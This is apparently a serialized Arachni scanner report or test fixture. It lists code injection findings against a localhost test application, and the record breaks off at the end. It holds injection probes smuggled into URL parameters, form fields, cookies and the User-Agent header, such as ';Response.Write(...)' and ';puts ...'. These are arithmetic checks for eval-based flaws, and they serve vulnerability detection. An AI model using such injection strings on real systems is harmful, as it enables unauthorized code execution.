tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;Response.Write(287630581954+4196403186331128) :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default;Response.Write(287630581954+4196403186331128) :follow_location: true :injected: default;Response.Write(287630581954+4196403186331128) :combo: !binary "aW5wdXQ=": default;Response.Write(287630581954+4196403186331128) :action: http://localhost:6875/asp/link/append?input=default :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/asp/link/append?input=default injected: default;Response.Write(287630581954+4196403186331128) id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: link remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzoxNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie url: http://localhost:6875/asp/cookie/straight elem: cookie method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ! ''';Response.Write(287630581954+4196403186331128)#' :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ! ''';Response.Write(287630581954+4196403186331128)#' :injected: ! ''';Response.Write(287630581954+4196403186331128)#' :combo: !binary "Y29va2ll": ! ''';Response.Write(287630581954+4196403186331128)#' :action: http://localhost:6875/asp/cookie/straight :verification: false :id: '4196690816913082' var: cookie url: http://localhost:6875/asp/cookie/straight injected: ! ''';Response.Write(287630581954+4196403186331128)#' id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: cookie remarks: {} method: GET response: ! 
'[4196690816913082, 4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie='%3BResponse.Write(287630581954%2B4196403186331128)#;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzoxOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie2 url: http://localhost:6875/asp/cookie/append elem: cookie method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ! ''';Response.Write(287630581954+4196403186331128)#' :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value';Response.Write(287630581954+4196403186331128)# :injected: cookie value';Response.Write(287630581954+4196403186331128)# :combo: !binary "Y29va2llMg==": cookie value';Response.Write(287630581954+4196403186331128)# :action: http://localhost:6875/asp/cookie/append :verification: false :id: '4196690816913082' var: cookie2 url: http://localhost:6875/asp/cookie/append injected: cookie value';Response.Write(287630581954+4196403186331128)# id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: cookie remarks: {} method: GET response: ! 
'[4196690816913082, 4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value'%3BResponse.Write(287630581954%2B4196403186331128)# response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzoyMSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:6875/asp/header/straight elem: header method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;Response.Write(287630581954+4196403186331128) :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ;Response.Write(287630581954+4196403186331128) :injected: ;Response.Write(287630581954+4196403186331128) :combo: User-Agent: ;Response.Write(287630581954+4196403186331128) :action: http://localhost:6875/asp/header/straight :verification: false :id: '4196690816913082' var: User-Agent url: http://localhost:6875/asp/header/straight injected: ;Response.Write(287630581954+4196403186331128) id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: header remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ;Response.Write(287630581954+4196403186331128) Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzozMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:6875/asp/header/append elem: header method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;Response.Write(287630581954+4196403186331128) :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user;Response.Write(287630581954+4196403186331128) :injected: arachni_user;Response.Write(287630581954+4196403186331128) :combo: User-Agent: arachni_user;Response.Write(287630581954+4196403186331128) :action: http://localhost:6875/asp/header/append :verification: false :id: '4196690816913082' var: User-Agent url: http://localhost:6875/asp/header/append injected: arachni_user;Response.Write(287630581954+4196403186331128) id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: header remarks: :stuff: - Blah - Blah2 method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user;Response.Write(287630581954+4196403186331128) Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzozMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/ruby/form/append elem: form method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;puts 287630581954+4196403186331128 :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default;puts 287630581954+4196403186331128 :follow_location: true :injected: default;puts 287630581954+4196403186331128 :combo: !binary "aW5wdXQ=": default;puts 287630581954+4196403186331128 :action: http://localhost:6875/ruby/form/append :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/ruby/form/append injected: default;puts 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: form remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo0MCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/ruby/form/straight elem: form method: POST name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ! ''';puts 287630581954+4196403186331128#' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! ''';puts 287630581954+4196403186331128#' :follow_location: true :injected: ! ''';puts 287630581954+4196403186331128#' :combo: !binary "aW5wdXQ=": ! ''';puts 287630581954+4196403186331128#' :action: http://localhost:6875/ruby/form/straight :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/ruby/form/straight injected: ! ''';puts 287630581954+4196403186331128#' id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: form remarks: {} method: POST response: ! 
'[4196690816913082, 4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo0MSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/ruby/link/straight?input=default elem: link method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;puts 287630581954+4196403186331128 :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ;puts 287630581954+4196403186331128 :follow_location: true :injected: ;puts 287630581954+4196403186331128 :combo: !binary "aW5wdXQ=": ;puts 287630581954+4196403186331128 :action: http://localhost:6875/ruby/link/straight?input=default :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/ruby/link/straight?input=default injected: ;puts 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: link remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo0MiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/ruby/link/append?input=default elem: link method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;puts 287630581954+4196403186331128 :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default;puts 287630581954+4196403186331128 :follow_location: true :injected: default;puts 287630581954+4196403186331128 :combo: !binary "aW5wdXQ=": default;puts 287630581954+4196403186331128 :action: http://localhost:6875/ruby/link/append?input=default :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/ruby/link/append?input=default injected: default;puts 287630581954+4196403186331128 id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: link remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo0MiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: 